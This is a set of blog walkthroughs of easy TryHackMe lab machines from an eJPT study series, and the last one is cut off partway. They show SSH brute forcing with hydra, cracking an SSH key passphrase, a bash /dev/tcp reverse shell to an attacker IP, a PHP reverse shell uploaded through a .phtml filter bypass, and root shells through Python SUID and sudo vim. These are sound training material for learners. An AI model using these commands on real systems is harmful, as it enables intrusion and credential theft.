[{"content":"Summary Basic Pentesting is the first machine in my Road to eJPTv2 series. It\u0026rsquo;s an excellent starting point because it covers several areas that appear on the exam: service enumeration (SMB, HTTP), directory fuzzing, SSH bruteforce, and SSH private key cracking. If you\u0026rsquo;re starting with TryHackMe and the eJPT, this machine is mandatory.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room Basic Pentesting Skills SMB Enum, Web Fuzzing, SSH Bruteforce, SSH Key Cracking Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration enum4linux — SMB enumeration gobuster — web directory fuzzing hydra — SSH bruteforce ssh2john + john — SSH key hash extraction and cracking Solution overview Nmap reveals SSH, HTTP, SMB ports and an additional service SMB enumeration with enum4linux reveals two users: jan and kay Web fuzzing with gobuster discovers a /development directory with hints SSH bruteforce with hydra against user jan obtains credentials Inside the system, we access kay\u0026rsquo;s id_rsa (root-equivalent user) The key is protected with a passphrase — cracked with john for final access Reconnaissance Connectivity check ping -c 1 10.X.X.X TTL=60 → target is Linux. This rules out typical Windows exploits like SMB EternalBlue and orients the strategy toward Unix service enumeration.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.X.X.X -n -Pn -sS -p- --min-rate=5000 -oG allTCPports Flag justification:\n-n skips DNS resolution, makes scan faster -Pn assumes host is up, skips ping (some firewalls block ICMP) -sS SYN scan — stealthy, doesn\u0026rsquo;t complete the TCP connection --min-rate=5000 forces minimum speed of 5000 packets/sec -oG greppable output, useful for piping ports to another scan Once open ports identified, targeted scan with version detection and default scripts:\nnmap 10.X.X.X -n -Pn -sS -sVC -p22,80,139,445,8009,8080 --min-rate=5000 -oN basicscan.txt Key findings:\n22/tcp — OpenSSH (potential bruteforce vector) 80/tcp — Apache (review content and fuzzing) 139/445 tcp — SMB Samba (enumeration with enum4linux) 8080/tcp — Apache Tomcat (potential admin login) SMB enumeration with enum4linux SMB is one of the most rewarding vectors on misconfigured Linux machines. Poorly protected users and shares often leak sensitive information.\nenum4linux -a 10.X.X.X Critical finding: two system users:\njan kay This changes the plan: now we have usernames, opening the door to targeted SSH bruteforce.\nWeb service enumeration Before jumping to bruteforce, we check the web for plaintext credentials or hints.\nwhatweb whatweb http://10.X.X.X Identifies the stack: Apache + standard tech. Nothing flashy at first glance.\nFuzzing with gobuster gobuster dir -u http://10.X.X.X \\ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \\ -t 50 -x php,txt,html Finding: accessible /development directory.\nInside, we find dev.txt with a message signed by two people, J and K — matches the users found via SMB. The notes mention that J is using a weak password.\nReasoning: this is the classic \u0026ldquo;info the dev team leaves by mistake\u0026rdquo; pattern. The hint is clear: jan has a weak password → targeted SSH bruteforce.\nExploitation Attack vector With the previous findings, the plan is:\nSSH bruteforce against user jan with hydra and a common wordlist Once inside, pivot to kay (likely the user with more privileges, based on the document signature) SSH bruteforce with Hydra hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.X.X.X -t 4 Flag justification:\n-l jan single user (not -L which would be a user list) -P rockyou.txt the most common wordlist for weak passwords -t 4 4 parallel tasks (higher can cause SSH server lockouts) Credentials obtained: jan:armando\nInitial access via SSH ssh jan@10.X.X.X Now inside the system with jan\u0026rsquo;s limited permissions.\nPost-exploitation Identity and context id uname -a hostname uid=1001(jan) gid=1001(jan) groups=1001(jan) Linux basic-pentesting 4.4.0-... jan is a standard user without visible privileged groups. Time to enumerate the system looking for the path to kay or root.\nSystem enumeration Reviewing home directories and accessible files:\nls -la /home/ ls -la /home/kay/ ls -la /home/kay/.ssh/ Critical finding: kay\u0026rsquo;s .ssh folder has read permissions for other users, allowing us to read the id_rsa (SSH private key).\ncat /home/kay/.ssh/id_rsa I copy the full key to my attacking machine for processing.\nPrivilege escalation Identified vector kay\u0026rsquo;s private key is accessible, but it\u0026rsquo;s protected with a passphrase. If I can crack the passphrase, I\u0026rsquo;ll have direct SSH access as kay. This is lateral movement, but kay has elevated permissions that jan doesn\u0026rsquo;t (we\u0026rsquo;ll confirm this after).\nHash extraction with ssh2john john can\u0026rsquo;t directly attack encrypted SSH keys; first we need to extract the hash in a format it understands:\nssh2john id_rsa \u0026gt; kay_hash Cracking with John the Ripper john --wordlist=/usr/share/wordlists/rockyou.txt kay_hash Passphrase obtained: beeswax\nFinal access as kay chmod 600 id_rsa ssh -i id_rsa kay@10.X.X.X Entering the passphrase, we get a shell as kay.\nFlag capture cat /home/kay/pass.bak Final flag: [contents of pass.bak]\nLessons learned SMB is gold on Linux machines — enum4linux should be one of your first moves when ports 139/445 appear. The user list obtained changed the entire plan. .txt file hints are intentional — In CTFs, files like dev.txt, notes.md, todo.txt always contain key info. Don\u0026rsquo;t skip them. Misconfigured .ssh permissions — A private key readable by other users is a common vulnerability in poorly administered real-world environments. Always check /home/*/.ssh/. SSH key passphrases are crackable — ssh2john + john is the standard combo. A weak passphrase completely defeats the protection of key encryption. For the eJPT This machine exercises skills directly evaluated on the eJPT:\nNmap enumeration (key syntax and flags) SMB enumeration with enum4linux Directory fuzzing with gobuster Bruteforcing with hydra Hash manipulation and cracking with john Approximate solving time: 30-45 minutes for someone familiar with the tools.\nReferences Basic Pentesting — TryHackMe Hydra documentation John the Ripper — ssh2john enum4linux — Cheatsheet ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/basic-pentesting/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBasic Pentesting\u003c/strong\u003e is the first machine in my \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series. It\u0026rsquo;s an excellent starting point because it covers several areas that appear on the exam: service enumeration (SMB, HTTP), directory fuzzing, SSH bruteforce, and SSH private key cracking. If you\u0026rsquo;re starting with TryHackMe and the eJPT, this machine is mandatory.\u003c/p\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eAttribute\u003c/th\u003e\n \u003cth\u003eValue\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003ePlatform\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eTryHackMe\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eDifficulty\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eEasy\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eOS\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eLinux\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eRoom\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e\u003ca href=\"https://tryhackme.com/room/basicpentestingjt\"\u003eBasic Pentesting\u003c/a\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eSkills\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eSMB Enum, Web Fuzzing, SSH Bruteforce, SSH Key Cracking\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch3 id=\"video-version\"\u003eVideo version\u003c/h3\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/r4KI2r7OnGw?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n \u003c/div\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIf you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\u003c/p\u003e","title":"Basic Pentesting"},{"content":"Summary Pickle Rick is the second machine in the Road to eJPTv2 series and one of the most entertaining on TryHackMe. Unlike the first machine where the vector was SSH bruteforce, here the focus is entirely web-based: source code review, directory enumeration, and exploitation of a command panel with direct RCE. The objective is to find three secret ingredients Rick needs to revert his pickle transformation.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room Pickle Rick Skills Web Enum, Source Code Review, RCE, Reverse Shell, Sudo Privesc 🎥 Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration whatweb — web server fingerprinting gobuster — directory and file fuzzing netcat — reverse shell listener Solution overview Nmap reveals only two ports: SSH (22) and HTTP (80) Page source code exposes username R1ckRul3s robots.txt leaks the password Wubbalubbadubdub Gobuster discovers /login.php — we log in with found credentials Portal has a command panel with direct RCE — we get a reverse shell Second ingredient found in /home/rick/ sudo -l reveals full passwordless permissions → sudo su → root Third ingredient in /root/3rd.txt Reconnaissance Connectivity check ping -c 1 10.201.1.254 64 bytes from 10.201.1.254: icmp_seq=1 ttl=60 time=145 ms TTL=60 → target machine is Linux. Important to orient the strategy from the start.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.201.1.254 -n -Pn -sS -p- --min-rate=5000 -oG allTCPports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Only two ports. A reduced attack surface means the solution goes through one of these two services. Without SSH credentials yet, the natural next step is to enumerate the web service.\nTargeted scan with version detection and scripts:\nnmap 10.201.1.254 -n -Pn -sS -sVC -p22,80 --min-rate=5000 -oN picklescan.txt PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 80/tcp open http Apache httpd 2.4.41 (Ubuntu) |_http-title: Rick is sup4r cool Key findings:\nPort 22: OpenSSH — no credentials yet, leave for later Port 80: Apache with title \u0026ldquo;Rick is sup4r cool\u0026rdquo; — there\u0026rsquo;s web content to explore WhatWeb fingerprinting whatweb http://10.201.1.254 Apache[2.4.41], Bootstrap, HTML5, JQuery, Title[Rick is sup4r cool] Standard stack: Apache + Bootstrap. No unusual technologies at first glance. Manual content enumeration is the next step.\nSource code review One of the first things to do on any web application is review the source code. Developers sometimes leave comments with sensitive information.\nIn the browser: Ctrl + U or right-click → \u0026ldquo;View page source\u0026rdquo;.\n\u0026lt;!-- Note to self, remember username! Username: R1ckRul3s --\u0026gt; Critical finding: username R1ckRul3s found in an HTML comment. Never leave credentials in comments — this is a very common information exposure vulnerability in poorly configured real-world environments.\nrobots.txt robots.txt is a standard file that tells search engines which pages not to index. In pentesting, always check it because it sometimes contains hidden paths or, as in this case, unexpected information.\nhttp://10.201.1.254/robots.txt Wubbalubbadubdub Finding: this string looks like a password. Combined with the username found in the source code, we have potential credentials: R1ckRul3s:Wubbalubbadubdub.\nFuzzing with Gobuster With credentials in hand, we need a login panel. Gobuster will search for hidden files and directories:\ngobuster dir -u http://10.201.1.254 \\ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \\ -t 50 -x php,txt,xml,html,bak /index.html (Status: 200) /login.php (Status: 200) /assets (Status: 301) /portal.php (Status: 302) [--\u0026gt; /login.php] /robots.txt (Status: 200) Key finding: /login.php with status 200 and /portal.php redirecting to login. The portal is what we\u0026rsquo;re looking for — we need to authenticate to access it.\nExploitation Web portal access Using the credentials found during reconnaissance:\nUsername: R1ckRul3s Password: Wubbalubbadubdub We access http://10.201.1.254/login.php and the credentials work. The portal redirects to /portal.php.\nRemote Code Execution (RCE) The portal has a \u0026ldquo;Commands\u0026rdquo; tab with a command input field and an \u0026ldquo;Execute\u0026rdquo; button. This is direct remote code execution — we can run operating system commands from the browser.\nWe verify real execution:\nwhoami www-data We have execution as www-data. From here we can browse the system or launch a reverse shell for more flexibility.\nFirst ingredient found directly from the panel:\ncat Sup3rS3cretPickl3Ingred.txt First ingredient: mr. meeseek hair\nReverse Shell For more flexibility and to run more complex commands, we launch a reverse shell. On our attacking machine:\nnc -nlvp 4545 From the portal command panel:\nbash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/10.13.93.83/4545 0\u0026gt;\u0026amp;1\u0026#39; connect to [10.13.93.83] from (UNKNOWN) [10.201.1.254] 56166 www-data@ip-10-201-1-254:/var/www/html$ Shell obtained. We stabilize:\nexport TERM=xterm export SHELL=bash stty rows 41 cols 183 A stabilized shell allows autocomplete, history, and won\u0026rsquo;t break on Ctrl+C. Always stabilize before continuing enumeration.\nPost-exploitation Identity and context id uname -a uid=33(www-data) gid=33(www-data) groups=33(www-data) Linux ip-10-201-1-254 5.15.0-1064-aws x86_64 GNU/Linux We are www-data — the web server user, no visible special privileges. We need to escalate.\nSecond ingredient Exploring home directories:\nls /home/ ls -l /home/rick/ cat /home/rick/second\\ ingredients Second ingredient: 1 jerry tear\nSSH key escalation attempt With access as www-data and knowledge of user rick, we try creating an SSH key to connect directly as rick:\n# On our attacking machine ssh-keygen -t rsa -b 2048 -f rick_key cp rick_key.pub authorized_keys chmod 600 authorized_keys python3 -m http.server 80 # On the victim machine wget http://10.13.93.83/authorized_keys -O /home/rick/.ssh/authorized_keys The key was transferred successfully, but SSH access didn\u0026rsquo;t work. Directory permissions on .ssh or SSH server configuration prevented it.\nImportant lesson: when one path fails, don\u0026rsquo;t get stuck. Enumerate other options. In this case, sudo -l revealed the real vector in seconds.\nPrivilege Escalation Sudo enumeration When SSH key escalation didn\u0026rsquo;t work, the next question is: what can www-data run with sudo?\nsudo -l User www-data may run the following commands on ip-10-201-1-254: (ALL) NOPASSWD: ALL Critical finding: www-data can run any command as any user without a password. This is an extremely dangerous misconfiguration. In a real environment, this means having root the moment you compromise the web server.\nEscalation to root sudo su whoami root Third ingredient cat /root/3rd.txt Third ingredient: 3rd ingredients: fleeb juice\nAll three ingredients # Ingredient Location 1 mr. meeseek hair /var/www/html/Sup3rS3cretPickl3Ingred.txt 2 1 jerry tear /home/rick/second ingredients 3 fleeb juice /root/3rd.txt Lessons learned Source code is always worth reviewing — An HTML comment exposed the username directly. In real applications, credentials and tokens in comments are critical findings in any web pentest. robots.txt isn\u0026rsquo;t just for SEO — In this machine it contained the password. In real environments it can reveal admin paths, internal APIs, or sensitive files the owner didn\u0026rsquo;t want indexed but left accessible. RCE from a web panel is the most direct vector possible — You don\u0026rsquo;t need sophisticated exploits if the application gives you direct command execution. Thorough web enumeration (gobuster + manual review) made it possible. When one path fails, enumerate another — The SSH key attempt with rick didn\u0026rsquo;t work. Instead of persisting, sudo -l revealed the real vector in seconds. Always have a privesc checklist and work through it. sudo -l should be one of your first post-shell commands — (ALL) NOPASSWD: ALL is one of the most dangerous configurations that exists on Linux. If it appears, you already have root. For the eJPT This machine exercises skills directly evaluated on the eJPT:\nManual web enumeration (source code, robots.txt) Directory fuzzing with gobuster RCE identification and exploitation Reverse shell setup and stabilization Privilege enumeration with sudo -l Linux privilege escalation via sudo misconfiguration Approximate solving time: 20-30 minutes once you master basic web enumeration.\nReferences Pickle Rick — TryHackMe Gobuster documentation PayloadsAllTheThings — Reverse Shell Cheatsheet GTFOBins — sudo ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/pickle-rick/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003ePickle Rick\u003c/strong\u003e is the second machine in the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and one of the most entertaining on TryHackMe. Unlike the first machine where the vector was SSH bruteforce, here the focus is entirely web-based: source code review, directory enumeration, and exploitation of a command panel with direct RCE. The objective is to find three secret ingredients Rick needs to revert his pickle transformation.\u003c/p\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eAttribute\u003c/th\u003e\n \u003cth\u003eValue\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003ePlatform\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eTryHackMe\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eDifficulty\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eEasy\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eOS\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eLinux\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eRoom\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e\u003ca href=\"https://tryhackme.com/room/picklerick\"\u003ePickle Rick\u003c/a\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eSkills\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eWeb Enum, Source Code Review, RCE, Reverse Shell, Sudo Privesc\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch3 id=\"-video-version\"\u003e🎥 Video version\u003c/h3\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/14xHZ8bSEeY?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n \u003c/div\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIf you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\u003c/p\u003e","title":"Pickle Rick"},{"content":"Summary RootMe is the third machine in the Road to eJPTv2 series and introduces two new techniques not seen before: file upload filter bypass and privilege escalation via Python SUID. Unlike previous machines where access came through exposed credentials or direct RCE, here we need to bypass an extension restriction to upload a reverse shell.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room RootMe Skills Web Enum, File Upload Bypass, Reverse Shell, SUID Abuse 🎥 Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration gobuster — directory fuzzing php-reverse-shell — Pentest Monkey webshell (included in Kali) netcat — reverse shell listener find — search for SUID binaries Solution overview Nmap reveals two ports: SSH (22) and HTTP (80) with Apache 2.4.41 Gobuster discovers /panel/ directory (file upload panel) The panel blocks .php extensions — bypassed by renaming to .phtml Reverse shell uploaded successfully and executed from /uploads/ User flag found at /var/www/user.txt SUID binary search reveals /usr/bin/python with SUID bit set Python SUID abuse with os.execl to get root shell Reconnaissance Connectivity check ping -c 1 10.201.73.204 64 bytes from 10.201.73.204: icmp_seq=1 ttl=60 time=144 ms TTL=60 → target is Linux. Consistent with previous machines in the series.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.201.73.204 -n -Pn -sS -p- --min-rate=5000 -oG allTCPports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Only two open ports. The reduced attack surface means the main vector is the web application.\nTargeted scan with version detection and scripts:\nnmap 10.201.73.204 -n -Pn -sS -sVC -p22,80 --min-rate=5000 -oN rootmescan.txt PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 80/tcp open http Apache httpd 2.4.41 (Ubuntu) |_http-title: HackIT - Home | http-cookie-flags: | /: PHPSESSID: httponly flag not set Key findings:\nPort 80: Apache with title \u0026ldquo;HackIT\u0026rdquo; — there\u0026rsquo;s a web application to explore PHPSESSID without httponly flag — the site uses PHP and cookies are accessible via JavaScript (relevant for XSS attacks in real scenarios) Port 22: SSH active — no credentials yet Fuzzing with Gobuster gobuster dir -u http://10.201.73.204 \\ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \\ -t 50 -x php,txt,xml,html,bak /index.php (Status: 200) /uploads (Status: 301) /css (Status: 301) /js (Status: 301) /panel (Status: 301) Key finding: two interesting directories:\n/panel/ → file upload panel (exploitation vector) /uploads/ → directory where uploaded files are stored (needed to execute the shell) The combination of upload panel + accessible uploads directory is the classic file upload vulnerability pattern.\nExploitation File upload panel We access http://10.201.73.204/panel/ and find a file upload form.\nThe first attempt is uploading a PHP reverse shell directly — the panel rejects it with an error message indicating .php files are not allowed.\nFile Upload Bypass: .phtml extension Poorly implemented extension filters only block the most obvious extensions (.php). Apache can execute PHP code with other extensions like .phtml, .php5, .phar, among others.\nWe prepare the reverse shell:\n# Copy the reverse shell included in Kali cp /usr/share/webshells/php/php-reverse-shell.php . # Rename mv php-reverse-shell.php rev.php # Edit IP and port (our attacking IP and listener port) nvim rev.php # Change extension to bypass the filter mv rev.php rev.phtml Why does .phtml work? Apache executes as PHP any file whose extension is mapped in its configuration. .phtml is an alternative PHP extension that many basic filters don\u0026rsquo;t include in their blacklist. This is an incomplete file type validation vulnerability.\nWe upload rev.phtml to the panel → the server accepts it.\nReverse Shell We set up a listener on our attacking machine:\nnc -nlvp 4545 We navigate to the URL where the file was uploaded to execute it:\nhttp://10.201.73.204/uploads/rev.phtml connect to [10.13.93.83] from (UNKNOWN) [10.201.73.204] 53644 Linux ip-10-201-73-204 5.15.0-139-generic uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can\u0026#39;t access tty; job control turned off $ Shell obtained as www-data. We stabilize:\nexport SHELL=bash stty rows 41 cols 184 Note: on this machine $SHELL returns /usr/sbin/nologin (the www-data user has no assigned shell). That\u0026rsquo;s why we manually export SHELL=bash so commands work correctly.\nPost-exploitation System enumeration We review home directories to identify system users:\nls -l /home drwxr-xr-x 4 rootme rootme 4096 rootme drwxr-xr-x 3 test test 4096 test drwxr-xr-x 4 ubuntu ubuntu 4096 ubuntu Three users: rootme, test, ubuntu. Home directories are empty, no useful information immediately.\nUser flag We search for user.txt across the entire system:\nfind / -type f -name user.txt 2\u0026gt;/dev/null /var/www/user.txt cat /var/www/user.txt User flag: THM{y0u_g0t_a_sh3ll}\nInteresting: the flag is not in a user home directory but in /var/www/. This reinforces that the compromise vector was the web server.\nPrivilege Escalation SUID binary search Binaries with the SUID bit set run with the permissions of the file owner (not the executing user). If a SUID binary belongs to root and allows arbitrary code execution, we have direct escalation.\nfind / -perm -4000 2\u0026gt;/dev/null /usr/bin/python2.7 From the entire list, one binary should not have SUID:\n/usr/bin/python2.7 Why is this unusual? Scripting language interpreters (Python, Perl, Ruby) with SUID are extremely dangerous because they allow executing arbitrary code with the owner\u0026rsquo;s privileges. They should never have SUID on a production system. GTFOBins documents exactly how to abuse this.\nPython SUID abuse Using Python to launch a shell that inherits the SUID privileges (root):\npython -c \u0026#39;import os; os.execl(\u0026#34;/bin/sh\u0026#34;, \u0026#34;sh\u0026#34;, \u0026#34;-p\u0026#34;)\u0026#39; # whoami root What does this command do?\nimport os imports the operating system module os.execl(\u0026quot;/bin/sh\u0026quot;, \u0026quot;sh\u0026quot;, \u0026quot;-p\u0026quot;) replaces the current process with a /bin/sh shell The -p flag means \u0026ldquo;privileged mode\u0026rdquo; — the shell keeps the effective UID (root) instead of dropping to the real UID (www-data) Root flag cd /root cat root.txt Root flag: THM{pr1v1l3g3_3sc4l4t10n}\nLessons learned Single blacklist extension filters are insufficient — Blocking only .php is a false sense of security. A robust filter should use a whitelist (only allow specific extensions like .jpg, .png) instead of a blacklist. In a real pentest, this finding would be a critical vulnerability. An accessible /uploads/ directory is the second half of the problem — Uploading the file is just the first step. If the server doesn\u0026rsquo;t serve uploaded files as executables or stores them outside the webroot, the impact is reduced. Here both conditions failed. find / -perm -4000 must be on your privesc checklist — SUID binaries are one of the most common escalation vectors in CTFs and misconfigured real environments. Python, Perl, Vim, Bash with SUID are immediate red flags. GTFOBins is your best friend for SUID — When you find an unusual binary with SUID, GTFOBins (gtfobins.github.io) has the exploitation technique ready. Learn to use it as a reference, not just memorize commands. The -p flag in shell is critical to maintain privileges — Without -p, the shell drops the effective UID and you fall back to the real UID. A small detail with huge impact. For the eJPT This machine exercises skills directly evaluated on the eJPT:\nWeb enumeration with Nmap and Gobuster File upload vulnerability identification and exploitation Extension filter bypass Reverse shells from PHP webshells SUID binary enumeration Privilege escalation via SUID abuse Approximate solving time: 25-35 minutes once you know file upload bypass techniques.\nReferences RootMe — TryHackMe GTFOBins — Python SUID PayloadsAllTheThings — File Upload Pentest Monkey — PHP Reverse Shell ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/root-me/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eRootMe\u003c/strong\u003e is the third machine in the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and introduces two new techniques not seen before: \u003cstrong\u003efile upload filter bypass\u003c/strong\u003e and \u003cstrong\u003eprivilege escalation via Python SUID\u003c/strong\u003e. Unlike previous machines where access came through exposed credentials or direct RCE, here we need to bypass an extension restriction to upload a reverse shell.\u003c/p\u003e\n\u003ctable\u003e\n \u003cthead\u003e\n \u003ctr\u003e\n \u003cth\u003eAttribute\u003c/th\u003e\n \u003cth\u003eValue\u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003ePlatform\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eTryHackMe\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eDifficulty\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eEasy\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eOS\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eLinux\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eRoom\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003e\u003ca href=\"https://tryhackme.com/room/rrootme\"\u003eRootMe\u003c/a\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\u003cstrong\u003eSkills\u003c/strong\u003e\u003c/td\u003e\n \u003ctd\u003eWeb Enum, File Upload Bypass, Reverse Shell, SUID Abuse\u003c/td\u003e\n \u003c/tr\u003e\n \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch3 id=\"-video-version\"\u003e🎥 Video version\u003c/h3\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/ckYf0BX5X5M?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n \u003c/div\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIf you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\u003c/p\u003e","title":"RootMe"},{"content":"Summary Simple CTF is the fourth machine in the Road to eJPTv2 series and the most technically varied so far. It introduces three new vectors: anonymous FTP access, SQLi exploitation with a real CVE (CVE-2019-9053) against CMS Made Simple, and privilege escalation via sudo vim. Additionally, the obtained hash is salted, requiring a custom cracking script — a differentiating skill.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room Simple CTF Skills FTP Enum, Web Enum, SQLi, Hash Cracking, SSH, Sudo Privesc 🎥 Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration ftp — anonymous server access gobuster — web directory fuzzing searchsploit — known exploit search Custom Python3 script — CVE-2019-9053 exploitation Custom Python3 script — salted MD5 hash cracking ssh — access with obtained credentials Solution overview Nmap reveals three services: FTP (21), HTTP (80) and SSH on non-standard port (2222) FTP allows anonymous login but passive mode times out Gobuster discovers /simple/ — CMS Made Simple version 2.2.8 Searchsploit identifies CVE-2019-9053 — time-based SQLi Python3 script extracts: salt, user mitch, email and MD5 hash Custom cracking script obtains the password: secret SSH access as mitch on port 2222 → user flag sudo -l reveals mitch can run vim as root Vim abuse with sudo vim -c ':!/bin/sh' → root Reconnaissance Connectivity check ping -c 1 10.201.40.102 64 bytes from 10.201.40.102: icmp_seq=1 ttl=60 time=140 ms TTL=60 → target is Linux.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.201.40.102 -n -Pn -sS -p- --min-rate 5000 -oG allTCPports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 2222/tcp open EtherNetIP-1 Three open ports — more attack surface than previous machines. Port 2222 stands out: Nmap identifies it as EtherNetIP-1, but version scanning will reveal its true nature.\nTargeted scan with version detection and scripts:\nnmap 10.201.40.102 -n -Pn -sS -sVC -p21,80,2222 --min-rate 5000 -oN simplescan.txt PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) 80/tcp open http Apache httpd 2.4.18 (Ubuntu) | http-robots.txt: 2 disallowed entries |_/ /openemr-5_0_1_3 